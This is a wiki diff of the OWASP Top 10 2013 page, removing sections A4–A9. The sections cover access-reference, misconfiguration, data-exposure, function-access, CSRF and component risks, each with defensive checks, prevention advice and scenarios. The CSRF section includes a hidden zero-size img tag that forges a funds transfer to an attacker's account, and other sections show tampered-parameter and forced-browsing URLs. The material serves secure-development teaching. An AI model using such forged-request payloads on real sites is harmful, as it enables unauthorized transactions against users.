| − | Preventing insecure direct object references requires selecting an approach for protecting each user accessible object (e.g., object number, filename):
| |
| − | # '''Use per user or session indirect object references.''' This prevents attackers from directly targeting unauthorized resources. For example, instead of using the resource’s database key, a drop down list of six resources authorized for the current user could use the numbers 1 to 6 to indicate which value the user selected. The application has to map the per-user indirect reference back to the actual database key on the server. OWASP’s [https://www.owasp.org/index.php/ESAPI ESAPI] includes both sequential and random access reference maps that developers can use to eliminate direct object references.
| |
| − | # '''Check access.''' Each use of a direct object reference from an untrusted source must include an access control check to ensure the user is authorized for the requested object.
| |
| | | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=4|year=2013|language=en}}
| |
| − | The application uses unverified data in a SQL call that is accessing account information:
| |
| − | {{Top_10_2010:ExampleBeginTemplate|year=2013}}
| |
| − | String query = "SELECT * FROM accts WHERE account = ?";
| |
| | | | |
| − | PreparedStatement pstmt = connection.prepareStatement(query , … );
| + | ='''A4-Insecure Direct Object References'''= |
| − | | |
| − | <span style="color:red;">pstmt.setString( 1, request.getParameter("acct"));</span>
| |
| − | | |
| − | ResultSet results = pstmt.executeQuery( );
| |
| − | {{Top_10_2010:ExampleEndTemplate}}
| |
| | | | |
| − | The attacker simply modifies the ‘acct’ parameter in their browser to send whatever account number they want. If not verified, the attacker can access any user’s account, instead of only the intended customer’s account.
| |
| − | {{Top_10_2010:ExampleBeginTemplate|year=2013}}
| |
| − | <nowiki>http://example.com/app/accountInfo?acct=</nowiki><span style="color:red;"><nowiki>notmyacct</nowiki></span>
| |
| − | {{Top_10_2010:ExampleEndTemplate}}
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=4|year=2013|language=en}}
| |
| − | {{Top_10_2010:SubSubsectionOWASPReferencesTemplate}}
| |
| − | * [https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference OWASP Top 10-2007 on Insecure Dir Object References]
| |
| − | * [http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.html ESAPI Access Reference Map API]
| |
| − | * [http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html ESAPI Access Control API] (See isAuthorizedForData(), isAuthorizedForFile(), isAuthorizedForFunction() )
| |
| | | | |
| − | For additional access control requirements, see the [https://www.owasp.org/index.php/ASVS ASVS requirements area for Access Control (V4)].
| |
| | | | |
| − | {{Top_10_2010:SubSubsectionExternalReferencesTemplate|language=en}}
| |
| − | * [http://cwe.mitre.org/data/definitions/639.html CWE Entry 639 on Insecure Direct Object References]
| |
| − | * [http://cwe.mitre.org/data/definitions/22.html CWE Entry 22 on Path Traversal] (is an example of a Direct Object Reference attack)
| |
| − |
| |
| − | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate
| |
| − | |headertab=FAQs
| |
| − | |usenext=2013NextLink
| |
| − | |next=A2-{{Top_10_2010:ByTheNumbers
| |
| − | |2
| |
| − | |year=2013
| |
| − | |language=en}}
| |
| − | |useprev=2013PrevLink
| |
| − | |prev={{Top_10:LanguageFile|text=top10|year=2013|language=en}}
| |
| − | |year=2013
| |
| − | |language=en
| |
| − | }}
| |
| | | | |
| | ='''A5-Security Misconfiguration'''= | | ='''A5-Security Misconfiguration'''= |
| | | | |
| − | {{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2013|language=en}}
| |
| − | {{Top_10:SummaryTableTemplate|exploitability=1|prevalence=2|detectability=1|impact=2|year=2013|language=en}}
| |
| − | {{Top_10_2010:SummaryTableHeaderEndTemplate|year=2013}}
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Consider anonymous external attackers as well as users with their own accounts that may attempt to compromise the system. Also consider insiders wanting to disguise their actions.
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Attacker accesses default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access to or knowledge of the system.
| |
| − |
| |
| − | </td>
| |
| − | <td colspan=2 {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, database, framework, and custom code. Developers and system administrators need to work together to ensure that the entire stack is configured properly. Automated scanners are useful for detecting missing patches, misconfigurations, use of default accounts, unnecessary services, etc.
| |
| − |
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | The system could be completely compromised without you knowing it. All of your data could be stolen or modified slowly over time.
| |
| − |
| |
| − | Recovery costs could be expensive
| |
| − |
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | The system could be completely compromised without you knowing it. All your data could be stolen or modified slowly over time.
| |
| − |
| |
| − | Recovery costs could be expensive.</td>
| |
| − | {{Top_10_2010:SummaryTableEndTemplate}}
| |
| − |
| |
| − | {{Top_10:SubsectionTableBeginTemplate|type=main}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=5|year=2013|language=en}}
| |
| − | Is your application missing the proper security hardening across any part of the application stack? Including:
| |
| − | # Is any of your software out of date? This includes the OS, Web/App Server, DBMS, applications, and all code libraries (see new A9).
| |
| − | # Are any unnecessary features enabled or installed (e.g., ports, services, pages, accounts, privileges)?
| |
| − | # Are default accounts and their passwords still enabled and unchanged?
| |
| − | # Does your error handling reveal stack traces or other overly informative error messages to users?
| |
| − | # Are the security settings in your development frameworks (e.g., Struts, Spring, ASP.NET) and libraries not set to secure values?
| |
| − |
| |
| − | Without a concerted, repeatable application security configuration process, systems are at a higher risk.
| |
| − |
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=5|year=2013|language=en}}
| |
| − | The primary recommendations are to establish all of the following:
| |
| − | # A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically (with different passwords used in each environment). This process should be automated to minimize the effort required to setup a new secure environment.
| |
| − | # A process for keeping abreast of and deploying all new software updates and patches in a timely manner to each deployed environment. This needs to include '''all code libraries as well (see new A9)'''.
| |
| − | # A strong application architecture that provides effective, secure separation between components.
| |
| − | # Consider running scans and doing audits periodically to help detect future misconfigurations or missing patches.
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=5|year=2013|language=en}}
| |
| − | '''Scenario #1:''' The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.
| |
| − |
| |
| − | '''Scenario #2:''' Directory listing is not disabled on your server. Attacker discovers she can simply list directories to find any file. Attacker finds and downloads all your compiled Java classes, which she decompiles and reverse engineers to get all your custom code. She then finds a serious access control flaw in your application.
| |
| − |
| |
| − | '''Scenario #3:''' App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws. Attackers love the extra information error messages provide.
| |
| − |
| |
| − | '''Scenario #4:''' App server comes with sample applications that are not removed from your production server. Said sample applications have well known security flaws attackers can use to compromise your server.
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=5|year=2013|language=en}}
| |
| − | {{Top_10_2010:SubSubsectionOWASPReferencesTemplate}}
| |
| − | * [https://www.owasp.org/index.php/Configuration OWASP Development Guide: Chapter on Configuration]
| |
| − | * [https://www.owasp.org/index.php/Error_Handling OWASP Code Review Guide: Chapter on Error Handling]
| |
| − | * [https://www.owasp.org/index.php/Testing_for_configuration_management OWASP Testing Guide: Configuration Management]
| |
| − | * [https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006) OWASP Testing Guide: Testing for Error Codes]
| |
| − | * [https://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management OWASP Top 10 2004 - Insecure Configuration Management ]
| |
| − |
| |
| − | For additional requirements in this area, see the [https://www.owasp.org/index.php/ASVS ASVS requirements area for Security Configuration (V12)].
| |
| − |
| |
| − | {{Top_10_2010:SubSubsectionExternalReferencesTemplate|language=en}}
| |
| − | * [http://www.pcmag.com/article2/0,2817,11525,00.asp PC Magazine Article on Web Server Hardening]
| |
| − | * [http://cwe.mitre.org/data/definitions/2.html CWE Entry 2 on Environmental Security Flaws]
| |
| − | * [http://benchmarks.cisecurity.org/downloads/benchmarks/ CIS Security Configuration Guides/Benchmarks]
| |
| − |
| |
| − | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate
| |
| − | |headertab=FAQs
| |
| − | |usenext=2013NextLink
| |
| − | |next=A2-{{Top_10_2010:ByTheNumbers
| |
| − | |2
| |
| − | |year=2013
| |
| − | |language=en}}
| |
| − | |useprev=2013PrevLink
| |
| − | |prev={{Top_10:LanguageFile|text=top10|year=2013|language=en}}
| |
| − | |year=2013
| |
| − | |language=en
| |
| − | }}
| |
| | | | |
| | ='''A6-Sensitive Data Exposure'''= | | ='''A6-Sensitive Data Exposure'''= |
| | | | |
| − | {{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2013|language=en}}
| |
| − | {{Top_10:SummaryTableTemplate|exploitability=3|prevalence=3|detectability=2|impact=1|year=2013|language=en}}
| |
| − | {{Top_10_2010:SummaryTableHeaderEndTemplate|year=2013}}
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Consider who can gain access to your sensitive data and any backups of that data. This includes the data at rest, in transit, and even in your customers’ browsers. Include both external and internal threats.
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Attackers typically don’t break crypto directly. They break something else, such as steal keys, do man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user’s browser.
| |
| − |
| |
| − | </td>
| |
| − | <td colspan=2 {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | The most common flaw is simply not encrypting sensitive data. When crypto is employed, weak key generation and management, and weak algorithm usage is common, particularly weak password hashing techniques. Browser weaknesses are very common and easy to detect, but hard to exploit on a large scale. External attackers have difficulty detecting server side flaws due to limited access and they are also usually hard to exploit.
| |
| − |
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Failure frequently compromises all data that should have been protected. Typically, this information includes sensitive data such as health records, credentials, personal data, credit cards, etc.
| |
| | | | |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Consider the business value of the lost data and impact to your reputation. What is your legal liability if this data is exposed? Also consider the damage to your reputation.
| |
| | | | |
| − | </td>
| |
| − | {{Top_10_2010:SummaryTableEndTemplate}}
| |
| − |
| |
| − | {{Top_10:SubsectionTableBeginTemplate|type=main}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=6|year=2013|language=en}}
| |
| − | The first thing you have to determine is which data is sensitive enough to require extra protection. For example, passwords, credit card numbers, health records, and personal information should be protected. For all such data:
| |
| − | # Is any of this data stored in clear text long term, including backups of this data?
| |
| − | # Is any of this data transmitted in clear text, internally or externally? Internet traffic is especially dangerous.
| |
| − | # Are any old / weak cryptographic algorithms used?
| |
| − | # Are weak crypto keys generated, or is proper key management or rotation missing?
| |
| − | # Are any browser security directives or headers missing when sensitive data is provided by / sent to the browser?
| |
| − |
| |
| − | And more … For a more complete set of problems to avoid, see [https://www.owasp.org/index.php/ASVS ASVS areas Crypto (V7), Data Prot. (V9), and SSL (V10)].
| |
| − |
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=6|year=2013|language=en}}
| |
| − | The full perils of unsafe cryptography, SSL usage, and data protection are well beyond the scope of the Top 10. That said, for all sensitive data, do all of the following, at a minimum:
| |
| − | # Considering the threats you plan to protect this data from (e.g., insider attack, external user), make sure you encrypt all sensitive data at rest and in transit in a manner that defends against these threats.
| |
| − | # Don’t store sensitive data unnecessarily. Discard it as soon as possible. Data you don’t have can’t be stolen.
| |
| − | # Ensure strong standard algorithms and strong keys are used, and proper key management is in place. Consider using [http://csrc.nist.gov/groups/STM/cmvp/documents/140-1/140val-all.htm FIPS 140 validated cryptographic modules].
| |
| − | # Ensure passwords are stored with an algorithm specifically designed for password protection, such as [http://en.wikipedia.org/wiki/Bcrypt bcrypt], [http://en.wikipedia.org/wiki/PBKDF2 PBKDF2], or [http://en.wikipedia.org/wiki/Scrypt scrypt].
| |
| − | # Disable autocomplete on forms collecting sensitive data and disable caching for pages that contain sensitive data.
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=6|year=2013|language=en}}
| |
| − | '''Scenario #1:''' An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts this data automatically when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key.
| |
| − |
| |
| − | '''Scenario #2:''' A site simply doesn’t use SSL for all authenticated pages. Attacker simply monitors network traffic (like an open wireless network), and steals the user’s session cookie. Attacker then replays this cookie and hijacks the user’s session, accessing the user’s private data.
| |
| − |
| |
| − | '''Scenario #3:''' The password database uses unsalted hashes to store everyone’s passwords. A file upload flaw allows an attacker to retrieve the password file. All of the unsalted hashes can be exposed with a rainbow table of precalculated hashes.
| |
| − |
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=6|year=2013|language=en}}
| |
| − | {{Top_10_2010:SubSubsectionOWASPReferencesTemplate}} <br/>
| |
| − | For a more complete set of requirements, see [https://www.owasp.org/index.php/ASVS ASVS req’ts on Cryptography (V7), Data Protection (V9)] and [https://www.owasp.org/index.php/ASVS Communications Security (V10)]
| |
| − | * [https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet OWASP Cryptographic Storage Cheat Sheet]
| |
| − | * [https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet OWASP Password Storage Cheat Sheet]
| |
| − | * [https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet OWASP Transport Layer Protection Cheat Sheet]
| |
| − | * [https://www.owasp.org/index.php/Testing_for_SSL-TLS OWASP Testing Guide: Chapter on SSL/TLS Testing]
| |
| − | {{Top_10_2010:SubSubsectionExternalReferencesTemplate|language=en}}
| |
| − | * [http://cwe.mitre.org/data/definitions/310.html CWE Entry 310 on Cryptographic Issues]
| |
| − | * [http://cwe.mitre.org/data/definitions/312.html CWE Entry 312 on Cleartext Storage of Sensitive Information]
| |
| − | * [http://cwe.mitre.org/data/definitions/319.html CWE Entry 319 on Cleartext Transmission of Sensitive Information]
| |
| − | * [http://cwe.mitre.org/data/definitions/326.html CWE Entry 326 on Weak Encryption]
| |
| − |
| |
| − |
| |
| − | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate
| |
| − | |headertab=FAQs
| |
| − | |usenext=2013NextLink
| |
| − | |next=A2-{{Top_10_2010:ByTheNumbers
| |
| − | |2
| |
| − | |year=2013
| |
| − | |language=en}}
| |
| − | |useprev=2013PrevLink
| |
| − | |prev={{Top_10:LanguageFile|text=top10|year=2013|language=en}}
| |
| − | |year=2013
| |
| − | |language=en
| |
| − | }}
| |
| | | | |
| | ='''A7-Missing Function Level Access Control'''= | | ='''A7-Missing Function Level Access Control'''= |
| | | | |
| − | {{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2013|language=en}}
| |
| − | {{Top_10:SummaryTableTemplate|exploitability=1|prevalence=2|detectability=2|impact=2|language=de|year=2013|language=en}}
| |
| − | {{Top_10_2010:SummaryTableHeaderEndTemplate|year=2013}}
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Anyone with network access can send your application a request. Could anonymous users access private functionality or regular users a privileged function?
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Attacker, who is an authorized system user, simply changes the URL or a parameter to a privileged function. Is access granted? Anonymous users could access private functions that aren’t protected.
| |
| − |
| |
| − | </td>
| |
| − | <td colspan=2 {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Applications do not always protect application functions properly. Sometimes, function level protection is managed via configuration, and the system is misconfigured. Sometimes, developers must include the proper code checks, and they forget.
| |
| − |
| |
| − | Detecting such flaws is easy. The hardest part is identifying which pages (URLs) or functions exist to attack.
| |
| − |
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Such flaws allow attackers to access unauthorized functionality. Administrative functions are key targets for this type of attack.
| |
| | | | |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Consider the business value of the exposed functions and the data they process.
| |
| | | | |
| − | Also consider the impact to your reputation if this vulnerability became public.
| |
| − |
| |
| − | </td>
| |
| − | {{Top_10_2010:SummaryTableEndTemplate}}
| |
| − |
| |
| − | {{Top_10:SubsectionTableBeginTemplate|type=main}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=7|year=2013|language=en}}
| |
| − | The best way to find out if an application has failed to properly restrict function level access is to verify every application function:
| |
| − | # Does the UI show navigation to unauthorized functions?
| |
| − | # Are server side authentication or authorization checks missing?
| |
| − | # Are server side checks done that solely rely on information provided by the attacker?
| |
| − |
| |
| − | Using a proxy, browse your application with a privileged role. Then revisit restricted pages using a less privileged role. If the server responses are alike, you're probably vulnerable. Some testing proxies directly support this type of analysis.
| |
| − |
| |
| − | You can also check the access control implementation in the code. Try following a single privileged request through the code and verifying the authorization pattern. Then search the codebase to find where that pattern is not being followed.
| |
| − |
| |
| − | Automated tools are unlikely to find these problems.
| |
| − |
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=7|year=2013|language=en}}
| |
| − | Your application should have a consistent and easy to analyze authorization module that is invoked from all of your business functions. Frequently, such protection is provided by one or more components external to the application code.
| |
| − | # Think about the process for managing entitlements and ensure you can update and audit easily. Don’t hard code.
| |
| − | # The enforcement mechanism(s) should deny all access by default, requiring explicit grants to specific roles for access to every function.
| |
| − | # If the function is involved in a workflow, check to make sure the conditions are in the proper state to allow access.
| |
| − |
| |
| − | NOTE: Most web applications don’t display links and buttons to unauthorized functions, but this “presentation layer access control” doesn’t actually provide protection. You must <u>also</u> implement checks in the controller or business logic.
| |
| − |
| |
| − |
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=7|year=2013|language=en}}
| |
| − | '''Scenario #1:''' The attacker simply force browses to target URLs. The following URLs require authentication. Admin rights are also required for access to the <u>admin_getappInfo</u> page.
| |
| − |
| |
| − | {{Top_10_2010:ExampleBeginTemplate|year=2013}}<nowiki>
| |
| − | http://example.com/app/getappInfo</nowiki><br/><nowiki>
| |
| − | http://example.com/app/admin_getappInfo
| |
| − | </nowiki> {{Top_10_2010:ExampleEndTemplate}}
| |
| − | If an unauthenticated user can access either page, that’s a flaw. If an authenticated, non-admin, user is allowed to access the <u>admin_getappInfo</u> page, this is also a flaw, and may lead the attacker to more improperly protected admin pages.
| |
| − |
| |
| − | '''Scenario #2:''' A page provides an 'action' parameter to specify the function being invoked, and different actions require different roles. If these roles aren’t enforced, that’s a flaw.
| |
| − |
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=7|year=2013|language=en}}
| |
| − | {{Top_10_2010:SubSubsectionOWASPReferencesTemplate}}
| |
| − | * [https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access OWASP Top 10-2007 on Failure to Restrict URL Access]
| |
| − | * [http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html ESAPI Access Control API]
| |
| − | * [https://www.owasp.org/index.php/Guide_to_Authorization OWASP Development Guide: Chapter on Authorization]
| |
| − | * [https://www.owasp.org/index.php/Testing_for_Path_Traversal OWASP Testing Guide: Testing for Path Traversal]
| |
| − | * [https://www.owasp.org/index.php/Forced_browsing OWASP Article on Forced Browsing]
| |
| − |
| |
| − | For additional access control requirements, see the [https://www.owasp.org/index.php/ASVS ASVS requirements area for Access Control (V4)].
| |
| − |
| |
| − | {{Top_10_2010:SubSubsectionExternalReferencesTemplate|language=en}}
| |
| − | * [http://cwe.mitre.org/data/definitions/285.html CWE Entry 285 on Improper Access Control (Authorization)]
| |
| − |
| |
| − | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate
| |
| − | |headertab=FAQs
| |
| − | |usenext=2013NextLink
| |
| − | |next=A2-{{Top_10_2010:ByTheNumbers
| |
| − | |2
| |
| − | |year=2013
| |
| − | |language=en}}
| |
| − | |useprev=2013PrevLink
| |
| − | |prev={{Top_10:LanguageFile|text=top10|year=2013|language=en}}
| |
| − | |year=2013
| |
| − | |language=en
| |
| − | }}
| |
| | | | |
| | ='''A8-Cross-Site Request Forgery (CSRF)'''= | | ='''A8-Cross-Site Request Forgery (CSRF)'''= |
| | | | |
| − | {{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2013|language=en}}
| |
| − | {{Top_10:SummaryTableTemplate|exploitability=2|prevalence=2|detectability=1|impact=2|year=2013|language=en}}
| |
| − | {{Top_10_2010:SummaryTableHeaderEndTemplate|year=2013}}
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Consider anyone who can load content into your users’ browsers, and thus force them to submit a request to your website. Any website or other HTML feed that your users access could do this.
| |
| − |
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Attacker creates forged HTTP requests and tricks a victim into submitting them via image tags, XSS, or numerous other techniques. <u>If the user is authenticated</u>, the attack succeeds.
| |
| − |
| |
| − | </td>
| |
| − | <td colspan=2 {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>[https://www.owasp.org/index.php/CSRF CSRF] takes advantage the fact that most web apps allow attackers to predict all the details of a particular action.
| |
| − |
| |
| − | Because browsers send credentials like session cookies automatically, attackers can create malicious web pages which generate forged requests that are indistinguishable from legitimate ones.
| |
| − |
| |
| − | Detection of CSRF flaws is fairly easy via penetration testing or code analysis.
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Attackers can trick victims into performing any state changing operation the victim is authorized to perform, e.g., updating account details, making purchases, logout and even login.
| |
| − |
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Consider the business value of the affected data or application functions. Imagine not being sure if users intended to take these actions.
| |
| − |
| |
| − | Consider the impact to your reputation.
| |
| − |
| |
| − | </td>
| |
| − | {{Top_10_2010:SummaryTableEndTemplate}}
| |
| − |
| |
| − | {{Top_10:SubsectionTableBeginTemplate|type=main}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=8|year=2013|language=en}}
| |
| − | To check whether an application is vulnerable, see if any links and forms lack an unpredictable CSRF token. Without such a token, attackers can forge malicious requests. An alternate defense is to require the user to prove they intended to submit the request, either through reauthentication, or some other proof they are a real user (e.g., a CAPTCHA).
| |
| | | | |
| − | Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets.
| |
| | | | |
| − | You should check multistep transactions, as they are not inherently immune. Attackers can easily forge a series of requests by using multiple tags or possibly JavaScript.
| |
| − |
| |
| − | Note that session cookies, source IP addresses, and other information automatically sent by the browser don’t provide any defense against CSRF since this information is also included in forged requests.
| |
| − |
| |
| − | OWASP’s [https://www.owasp.org/index.php/CSRFTester CSRF Tester] tool can help generate test cases to demonstrate the dangers of CSRF flaws.
| |
| − |
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=8|year=2013|language=en}}
| |
| − | Preventing CSRF usually requires the inclusion of an unpredictable token in each HTTP request. Such tokens should, at a minimum, be unique per user session.
| |
| − | # The preferred option is to include the unique token in a hidden field. This causes the value to be sent in the body of the HTTP request, avoiding its inclusion in the URL, which is more prone to exposure.
| |
| − | # The unique token can also be included in the URL itself, or a URL parameter. However, such placement runs a greater risk that the URL will be exposed to an attacker, thus compromising the secret token.<br/>OWASP’s [https://www.owasp.org/index.php/CSRFGuard CSRF Guard] can automatically include such tokens in Java EE, .NET, or PHP apps. OWASP’s [https://www.owasp.org/index.php/ESAPI ESAPI] includes methods developers can use to prevent CSRF vulnerabilities.
| |
| − | # Requiring the user to reauthenticate, or prove they are a user (e.g., via a CAPTCHA) can also protect against CSRF.
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=8|year=2013|language=en}}
| |
| − | The application allows a user to submit a state changing request that does not include anything secret. For example:
| |
| − | {{Top_10_2010:ExampleBeginTemplate|year=2013}}
| |
| − | <nowiki>http://</nowiki>example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
| |
| − | {{Top_10_2010:ExampleEndTemplate}}
| |
| − | So, the attacker constructs a request that will transfer money from the victim’s account to the attacker’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control:
| |
| − | {{Top_10_2010:ExampleBeginTemplate|year=2013}}
| |
| − | <img src="<span style="color: red;"><nowiki>http://</nowiki>example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#</span>" width="0" height="0" />
| |
| − | {{Top_10_2010:ExampleEndTemplate}}
| |
| − | If the victim visits any of the attacker’s sites while already authenticated to example.com, these forged requests will automatically include the user’s session info, authorizing the attacker’s request.
| |
| − |
| |
| − |
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=8|year=2013|language=en}}
| |
| − | {{Top_10_2010:SubSubsectionOWASPReferencesTemplate}}
| |
| − | * [https://www.owasp.org/index.php/CSRFGuard OWASP CSRF Article]
| |
| − | * [https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet OWASP CSRF Prevention Cheat Sheet]
| |
| − | * [https://www.owasp.org/index.php/CSRFGuard OWASP CSRFGuard - CSRF Defense Tool ]
| |
| − | * [https://www.owasp.org/index.php/ESAPI ESAPI Project Home Page]
| |
| − | * [http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html ESAPI HTTPUtilities Class with AntiCSRF Tokens]
| |
| − | * [https://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005) OWASP Testing Guide: Chapter on CSRF Testing]
| |
| − | * [https://www.owasp.org/index.php/CSRFTester OWASP CSRFTester - CSRF Testing Tool ]
| |
| − |
| |
| − | {{Top_10_2010:SubSubsectionExternalReferencesTemplate|language=en}}
| |
| − | * [http://cwe.mitre.org/data/definitions/352.html CWE Entry 352 on CSRF]
| |
| − |
| |
| − | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate
| |
| − | |headertab=FAQs
| |
| − | |usenext=2013NextLink
| |
| − | |next=A2-{{Top_10_2010:ByTheNumbers
| |
| − | |2
| |
| − | |year=2013
| |
| − | |language=en}}
| |
| − | |useprev=2013PrevLink
| |
| − | |prev={{Top_10:LanguageFile|text=top10|year=2013|language=en}}
| |
| − | |year=2013
| |
| − | |language=en
| |
| − | }}
| |
| | | | |
| | ='''A9-Using Components with Known Vulnerabilities'''= | | ='''A9-Using Components with Known Vulnerabilities'''= |
| | | | |
| − | {{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2013|language=en}}
| |
| − | {{Top_10:SummaryTableTemplate|exploitability=2|prevalence=1|detectability=3|impact=2|year=2013|language=en}}
| |
| − | {{Top_10_2010:SummaryTableHeaderEndTemplate|year=2013}}
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Some vulnerable components (e.g., framework libraries) can be identified and exploited with automated tools, expanding the threat agent pool beyond targeted attackers to include chaotic actors.
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Attacker identifies a weak component through scanning or manual analysis. He customizes the exploit as needed and executes the attack. It gets more difficult if the used component is deep in the application.
| |
| | | | |
| − | </td>
| |
| − | <td colspan=2 {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Virtually every application has these issues because most development teams don’t focus on ensuring their components/libraries are up to date. In many cases, the developers don’t even know all the components they are using, never mind their versions. Component dependencies make things even worse.
| |
| | | | |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | The full range of weaknesses is possible, including injection, broken access control, XSS, etc. The impact could range from minimal to complete host takeover and data compromise.
| |
| − |
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Consider what each vulnerability might mean for the business controlled by the affected application. It could be trivial or it could mean complete compromise.
| |
| − |
| |
| − | </td>
| |
| − | {{Top_10_2010:SummaryTableEndTemplate}}
| |
| − |
| |
